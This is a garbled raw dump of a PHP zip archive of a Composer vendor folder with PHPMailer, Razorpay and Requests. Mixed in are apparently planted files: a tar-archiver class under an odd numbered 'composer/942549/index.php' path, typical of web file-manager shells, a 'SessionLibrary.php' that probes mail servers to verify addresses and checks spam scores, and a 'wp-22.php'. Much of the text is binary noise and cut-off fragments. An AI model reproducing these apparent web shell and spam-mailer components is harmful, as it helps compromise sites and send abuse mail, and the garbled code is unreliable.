getPrefixesPsr4() { return $this->prefixDirsPsr4; } public function getFallbackDirs() { return $this->fallbackDirsPsr0; } public function getFallbackDirsPsr4() { return $this->fallbackDirsPsr4; } public function getClassMap() { return $this->classMap; } /** * @param array $classMap Class to filename map */ public function addClassMap(array $classMap) { if ($this->classMap) { $this->classMap = array_merge($this->classMap, $classMap); } else { $this->classMap = $classMap; } } /** * Registers a set of PSR-0 directories for a given prefix, either * appending or prepending to the ones previously set for this prefix. * * @param string $prefix The prefix * @param array|string $paths The PSR-0 root directories * @param bool $prepend Whether to prepend the directories */ public function add($prefix, $paths, $prepend = false) { if (!$prefix) { if ($prepend) { $this->fallbackDirsPsr0 = array_merge( (array) $paths, $this->fallbackDirsPsr0 ); } else { $this->fallbackDirsPsr0 = array_merge( $this->fallbackDirsPsr0, (array) $paths ); } return; } $first = $prefix[0]; if (!isset($this->prefixesPsr0[$first][$prefix])) { $this->prefixesPsr0[$first][$prefix] = (array) $paths; return; } if ($prepend) { $this->prefixesPsr0[$first][$prefix] = array_merge( (array) $paths, $this->prefixesPsr0[$first][$prefix] ); } else { $this->prefixesPsr0[$first][$prefix] = array_merge( $this->prefixesPsr0[$first][$prefix], (array) $paths ); } } /** * Registers a set of PSR-4 directories for a given namespace, either * appending or prepending to the ones previously set for this namespace. * * @param string $prefix The prefix/namespace, with trailing '\\' * @param array|string $paths The PSR-4 base directories * @param bool $prepend Whether to prepend the directories * * @throws \InvalidArgumentException */ public function addPsr4($prefix, $paths, $prepend = false) { if (!$prefix) { // Register directories for the root namespace. if ($prepend) { $this->fallbackDirsPsr4 = array_merge( (array) $paths, $this->fallbackDirsPsr4 ); } else { $this->fallbackDirsPsr4 = array_merge( $this->fallbackDirsPsr4, (array) $paths ); } } elseif (!isset($this->prefixDirsPsr4[$prefix])) { // Register directories for a new namespace. $length = strlen($prefix); if ('\\' !== $prefix[$length - 1]) { throw new \InvalidArgumentException("A non-empty PSR-4 prefix must end with a namespace separator."); } $this->prefixLengthsPsr4[$prefix[0]][$prefix] = $length; $this->prefixDirsPsr4[$prefix] = (array) $paths; } elseif ($prepend) { // Prepend directories for an already registered namespace. $this->prefixDirsPsr4[$prefix] = array_merge( (array) $paths, $this->prefixDirsPsr4[$prefix] ); } else { // Append directories for an already registered namespace. $this->prefixDirsPsr4[$prefix] = array_merge( $this->prefixDirsPsr4[$prefix], (array) $paths ); } } /** * Registers a set of PSR-0 directories for a given prefix, * replacing any others previously set for this prefix. * * @param string $prefix The prefix * @param array|string $paths The PSR-0 base directories */ public function set($prefix, $paths) { if (!$prefix) { $this->fallbackDirsPsr0 = (array) $paths; } else { $this->prefixesPsr0[$prefix[0]][$prefix] = (array) $paths; } } /** * Registers a set of PSR-4 directories for a given namespace, * replacing any others previously set for this namespace. * * @param string $prefix The prefix/namespace, with trailing '\\' * @param array|string $paths The PSR-4 base directories * * @throws \InvalidArgumentException */ public function setPsr4($prefix, $paths) { if (!$prefix) { $this->fallbackDirsPsr4 = (array) $paths; } else { $length = strlen($prefix); if ('\\' !== $prefix[$length - 1]) { throw new \InvalidArgumentException("A non-empty PSR-4 prefix must end with a namespace separator."); } $this->prefixLengthsPsr4[$prefix[0]][$prefix] = $length; $this->prefixDirsPsr4[$prefix] = (array) $paths; } } /** * Turns on searching the include path for class files. * * @param bool $useIncludePath */ public function setUseIncludePath($useIncludePath) { $this->useIncludePath = $useIncludePath; } /** * Can be used to check if the autoloader uses the include path to check * for classes. * * @return bool */ public function getUseIncludePath() { return $this->useIncludePath; } /** * Turns off searching the prefix and fallback directories for classes * that have not been registered with the class map. * * @param bool $classMapAuthoritative */ public function setClassMapAuthoritative($classMapAuthoritative) { $this->classMapAuthoritative = $classMapAuthoritative; } /** * Should class lookup fail if not found in the current class map? * * @return bool */ public function isClassMapAuthoritative() { return $this->classMapAuthoritative; } /** * APCu prefix to use to cache found/not-found classes, if the extension is enabled. * * @param string|null $apcuPrefix */ public function setApcuPrefix($apcuPrefix) { $this->apcuPrefix = function_exists('apcu_fetch') && filter_var(ini_get('apc.enabled'), FILTER_VALIDATE_BOOLEAN) ? $apcuPrefix : null; } /** * The APCu prefix in use, or null if APCu caching is not enabled. * * @return string|null */ public function getApcuPrefix() { return $this->apcuPrefix; } /** * Registers this instance as an autoloader. * * @param bool $prepend Whether to prepend the autoloader or not */ public function register($prepend = false) { spl_autoload_register(array($this, 'loadClass'), true, $prepend); } /** * Unregisters this instance as an autoloader. */ public function unregister() { spl_autoload_unregister(array($this, 'loadClass')); } /** * Loads the given class or interface. * * @param string $class The name of the class * @return bool|null True if loaded, null otherwise */ public function loadClass($class) { if ($file = $this->findFile($class)) { includeFile($file); return true; } } /** * Finds the path to the file where the class is defined. * * @param string $class The name of the class * * @return string|false The path if found, false otherwise */ public function findFile($class) { // class map lookup if (isset($this->classMap[$class])) { return $this->classMap[$class]; } if ($this->classMapAuthoritative || isset($this->missingClasses[$class])) { return false; } if (null !== $this->apcuPrefix) { $file = apcu_fetch($this->apcuPrefix.$class, $hit); if ($hit) { return $file; } } $file = $this->findFileWithExtension($class, '.php'); // Search for Hack files if we are running on HHVM if (false === $file && defined('HHVM_VERSION')) { $file = $this->findFileWithExtension($class, '.hh'); } if (null !== $this->apcuPrefix) { apcu_add($this->apcuPrefix.$class, $file); } if (false === $file) { // Remember that this class does not exist. $this->missingClasses[$class] = true; } return $file; } private function findFileWithExtension($class, $ext) { // PSR-4 lookup $logicalPathPsr4 = strtr($class, '\\', DIRECTORY_SEPARATOR) . $ext; $first = $class[0]; if (isset($this->prefixLengthsPsr4[$first])) { $subPath = $class; while (false !== $lastPos = strrpos($subPath, '\\')) { $subPath = substr($subPath, 0, $lastPos); $search = $subPath . '\\'; if (isset($this->prefixDirsPsr4[$search])) { $pathEnd = DIRECTORY_SEPARATOR . substr($logicalPathPsr4, $lastPos + 1); foreach ($this->prefixDirsPsr4[$search] as $dir) { if (file_exists($file = $dir . $pathEnd)) { return $file; } } } } } // PSR-4 fallback dirs foreach ($this->fallbackDirsPsr4 as $dir) { if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr4)) { return $file; } } // PSR-0 lookup if (false !== $pos = strrpos($class, '\\')) { // namespaced class name $logicalPathPsr0 = substr($logicalPathPsr4, 0, $pos + 1) . strtr(substr($logicalPathPsr4, $pos + 1), '_', DIRECTORY_SEPARATOR); } else { // PEAR-like class name $logicalPathPsr0 = strtr($class, '_', DIRECTORY_SEPARATOR) . $ext; } if (isset($this->prefixesPsr0[$first])) { foreach ($this->prefixesPsr0[$first] as $prefix => $dirs) { if (0 === strpos($class, $prefix)) { foreach ($dirs as $dir) { if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr0)) { return $file; } } } } } // PSR-0 fallback dirs foreach ($this->fallbackDirsPsr0 as $dir) { if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr0)) { return $file; } } // PSR-0 include paths. if ($this->useIncludePath && $file = stream_resolve_include_path($logicalPathPsr0)) { return $file; } return false; } } /** * Scope isolated include. * * Prevents access to $this/self from included files. */ function includeFile($file) { include $file; } PK@fZ ..composer/LICENSEnu[ Copyright (c) Nils Adermann, Jordi Boggiano Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. PK@fZi qqcomposer/autoload_psr4.phpnu[ array($vendorDir . '/razorpay/razorpay/tests'), 'Razorpay\\Api\\' => array($vendorDir . '/razorpay/razorpay/src'), 'PHPMailer\\PHPMailer\\' => array($vendorDir . '/phpmailer/phpmailer/src'), ); PK@fZzcomposer/autoload_static.phpnu[ array ( 'Razorpay\\Tests\\' => 15, 'Razorpay\\Api\\' => 13, ), 'P' => array ( 'PHPMailer\\PHPMailer\\' => 20, ), ); public static $prefixDirsPsr4 = array ( 'Razorpay\\Tests\\' => array ( 0 => __DIR__ . '/..' . '/razorpay/razorpay/tests', ), 'Razorpay\\Api\\' => array ( 0 => __DIR__ . '/..' . '/razorpay/razorpay/src', ), 'PHPMailer\\PHPMailer\\' => array ( 0 => __DIR__ . '/..' . '/phpmailer/phpmailer/src', ), ); public static $prefixesPsr0 = array ( 'R' => array ( 'Requests' => array ( 0 => __DIR__ . '/..' . '/rmccue/requests/library', ), ), ); public static function getInitializer(ClassLoader $loader) { return \Closure::bind(function () use ($loader) { $loader->prefixLengthsPsr4 = ComposerStaticInit3fb067393dcb931909e3fad867467997::$prefixLengthsPsr4; $loader->prefixDirsPsr4 = ComposerStaticInit3fb067393dcb931909e3fad867467997::$prefixDirsPsr4; $loader->prefixesPsr0 = ComposerStaticInit3fb067393dcb931909e3fad867467997::$prefixesPsr0; }, null, ClassLoader::class); } } PK@fZcomposer/autoload_real.phpnu[= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded()); if ($useStaticLoader) { require_once __DIR__ . '/autoload_static.php'; call_user_func(\Composer\Autoload\ComposerStaticInit3fb067393dcb931909e3fad867467997::getInitializer($loader)); } else { $map = require __DIR__ . '/autoload_namespaces.php'; foreach ($map as $namespace => $path) { $loader->set($namespace, $path); } $map = require __DIR__ . '/autoload_psr4.php'; foreach ($map as $namespace => $path) { $loader->setPsr4($namespace, $path); } $classMap = require __DIR__ . '/autoload_classmap.php'; if ($classMap) { $loader->addClassMap($classMap); } } $loader->register(true); return $loader; } } PK@fZ;~++composer/installed.jsonnu[[ { "name": "phpmailer/phpmailer", "version": "v6.1.4", "version_normalized": "6.1.4.0", "source": { "type": "git", "url": "https://github.com/PHPMailer/PHPMailer.git", "reference": "c5e61d0729507049cec9673aa1a679f9adefd683" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/PHPMailer/PHPMailer/zipball/c5e61d0729507049cec9673aa1a679f9adefd683", "reference": "c5e61d0729507049cec9673aa1a679f9adefd683", "shasum": "" }, "require": { "ext-ctype": "*", "ext-filter": "*", "php": ">=5.5.0" }, "require-dev": { "doctrine/annotations": "^1.2", "friendsofphp/php-cs-fixer": "^2.2", "phpunit/phpunit": "^4.8 || ^5.7" }, "suggest": { "ext-mbstring": "Needed to send email in multibyte encoding charset", "hayageek/oauth2-yahoo": "Needed for Yahoo XOAUTH2 authentication", "league/oauth2-google": "Needed for Google XOAUTH2 authentication", "psr/log": "For optional PSR-3 debug logging", "stevenmaguire/oauth2-microsoft": "Needed for Microsoft XOAUTH2 authentication", "symfony/polyfill-mbstring": "To support UTF-8 if the Mbstring PHP extension is not enabled (^1.2)" }, "time": "2019-12-10T11:17:38+00:00", "type": "library", "installation-source": "dist", "autoload": { "psr-4": { "PHPMailer\\PHPMailer\\": "src/" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "LGPL-2.1-only" ], "authors": [ { "name": "Marcus Bointon", "email": "phpmailer@synchromedia.co.uk" }, { "name": "Jim Jagielski", "email": "jimjag@gmail.com" }, { "name": "Andy Prevost", "email": "codeworxtech@users.sourceforge.net" }, { "name": "Brent R. Matzelle" } ], "description": "PHPMailer is a full-featured email creation and transfer class for PHP" }, { "name": "razorpay/razorpay", "version": "2.5.0", "version_normalized": "2.5.0.0", "source": { "type": "git", "url": "https://github.com/razorpay/razorpay-php.git", "reference": "96c0167176cf53e3da15640622e9b993a3450ec7" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/razorpay/razorpay-php/zipball/96c0167176cf53e3da15640622e9b993a3450ec7", "reference": "96c0167176cf53e3da15640622e9b993a3450ec7", "shasum": "" }, "require": { "ext-json": "*", "php": ">=5.3.0", "rmccue/requests": "v1.7.0" }, "require-dev": { "phpunit/phpunit": "~4.8|~5.0", "raveren/kint": "1.*" }, "time": "2019-05-20T13:15:50+00:00", "type": "library", "installation-source": "dist", "autoload": { "psr-4": { "Razorpay\\Api\\": "src/", "Razorpay\\Tests\\": "tests/" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "authors": [ { "name": "Abhay Rana", "email": "nemo@razorpay.com", "homepage": "https://captnemo.in", "role": "Developer" }, { "name": "Shashank Kumar", "email": "shashank@razorpay.com", "role": "Developer" } ], "description": "Razorpay PHP Client Library", "homepage": "https://docs.razorpay.com", "keywords": [ "api", "client", "php", "razorpay" ] }, { "name": "rmccue/requests", "version": "v1.7.0", "version_normalized": "1.7.0.0", "source": { "type": "git", "url": "https://github.com/rmccue/Requests.git", "reference": "87932f52ffad70504d93f04f15690cf16a089546" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/rmccue/Requests/zipball/87932f52ffad70504d93f04f15690cf16a089546", "reference": "87932f52ffad70504d93f04f15690cf16a089546", "shasum": "" }, "require": { "php": ">=5.2" }, "require-dev": { "requests/test-server": "dev-master" }, "time": "2016-10-13T00:11:37+00:00", "type": "library", "installation-source": "dist", "autoload": { "psr-0": { "Requests": "library/" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "ISC" ], "authors": [ { "name": "Ryan McCue", "homepage": "http://ryanmccue.info" } ], "description": "A HTTP library written in PHP, for human beings.", "homepage": "http://github.com/rmccue/Requests", "keywords": [ "curl", "fsockopen", "http", "idna", "ipv6", "iri", "sockets" ] } ] PK@fZcomposer/index.phpnu[PK@fZbcomposer/autoload_classmap.phpnu[<\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?>PK@fZķ5VaVacomposer/942549/index.phpnu[PK@fZ|6 composer/autoload_namespaces.phpnu[ array($vendorDir . '/rmccue/requests/library'), ); PK@fZEn composer/SessionLibrary.phpnu["; fwrite($sock, $msg."\r\n"); $reply = fread($sock, 2082); $msg="RCPT TO: <".$name.'@'.$domain.">"; fwrite($sock, $msg."\r\n"); $reply = fread($sock, 2082); preg_match('/^([0-9]{3}) /ims', $reply, $matches); $code = isset($matches[1]) ? $matches[1] : ''; if($code == '250') { $result=true; }elseif($code == '451' || $code == '452') { $result=true; }else{ $result=false; } $msg="quit"; fwrite($sock, $msg."\r\n"); fclose($sock); } return $result; } function get_spam_score($raw_email) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, 'http://spamcheck.postmarkapp.com/filter'); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('email' => $raw_email,'options'=>'short'))); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 15); $response = curl_exec($ch); if(empty($response) || curl_error($ch) || curl_getinfo($ch, CURLINFO_HTTP_CODE) !== 200){ curl_close($ch); return FALSE; } curl_close($ch); $score = json_decode($response); if ($score->success == TRUE AND is_numeric($score->score)) return $score->score; else return FALSE; } ?>
PK@fZ5%88 wp-22.phpnu[PK@fZmgg.9phpmailer/phpmailer/LICENSEnu[PK@fZ???phpmailer/phpmailer/README.mdnu[PK@fZ0w*'8phpmailer/phpmailer/get_oauth_token.phpnu[PK@fZphpmailer/phpmailer/VERSIONnu[PK@fZO04!phpmailer/phpmailer/composer.jsonnu[PK@fZ<(C C 2Ephpmailer/phpmailer/language/phpmailer.lang-ka.phpnu[PK@fZ2phpmailer/phpmailer/language/phpmailer.lang-de.phpnu[PK@fZ2"phpmailer/phpmailer/language/phpmailer.lang-ru.phpnu[PK@fZt2Jphpmailer/phpmailer/language/phpmailer.lang-ms.phpnu[PK@fZd312qphpmailer/phpmailer/language/phpmailer.lang-sr.phpnu[PK@fZO2'phpmailer/phpmailer/language/phpmailer.lang-pl.phpnu[PK@fZW%2I/phpmailer/phpmailer/language/phpmailer.lang-hu.phpnu[PK@fZ2_6phpmailer/phpmailer/language/phpmailer.lang-hr.phpnu[PK@fZLdd2=phpmailer/phpmailer/language/phpmailer.lang-fo.phpnu[PK@fZjq2`Dphpmailer/phpmailer/language/phpmailer.lang-bg.phpnu[PK@fZ=ZX//2UMphpmailer/phpmailer/language/phpmailer.lang-af.phpnu[PK@fZndJww5Sphpmailer/phpmailer/language/phpmailer.lang-zh_cn.phpnu[PK@fZGe2Zphpmailer/phpmailer/language/phpmailer.lang-fa.phpnu[PK@fZ2Bcphpmailer/phpmailer/language/phpmailer.lang-tl.phpnu[PK@fZi2Hjphpmailer/phpmailer/language/phpmailer.lang-fi.phpnu[PK@fZ%2lqphpmailer/phpmailer/language/phpmailer.lang-ca.phpnu[PK@fZ"Z"2xphpmailer/phpmailer/language/phpmailer.lang-fr.phpnu[PK@fZmKK2ŀphpmailer/phpmailer/language/phpmailer.lang-da.phpnu[PK@fZy2rphpmailer/phpmailer/language/phpmailer.lang-be.phpnu[PK@fZKK2Uphpmailer/phpmailer/language/phpmailer.lang-sv.phpnu[PK@fZjS<2phpmailer/phpmailer/language/phpmailer.lang-es.phpnu[PK@fZm2phpmailer/phpmailer/language/phpmailer.lang-nb.phpnu[PK@fZU.`2phpmailer/phpmailer/language/phpmailer.lang-nl.phpnu[PK@fZ 2«phpmailer/phpmailer/language/phpmailer.lang-he.phpnu[PK@fZ|7=27phpmailer/phpmailer/language/phpmailer.lang-ba.phpnu[PK@fZtL2hphpmailer/phpmailer/language/phpmailer.lang-sl.phpnu[PK@fZ 2phpmailer/phpmailer/language/phpmailer.lang-vi.phpnu[PK@fZ$ 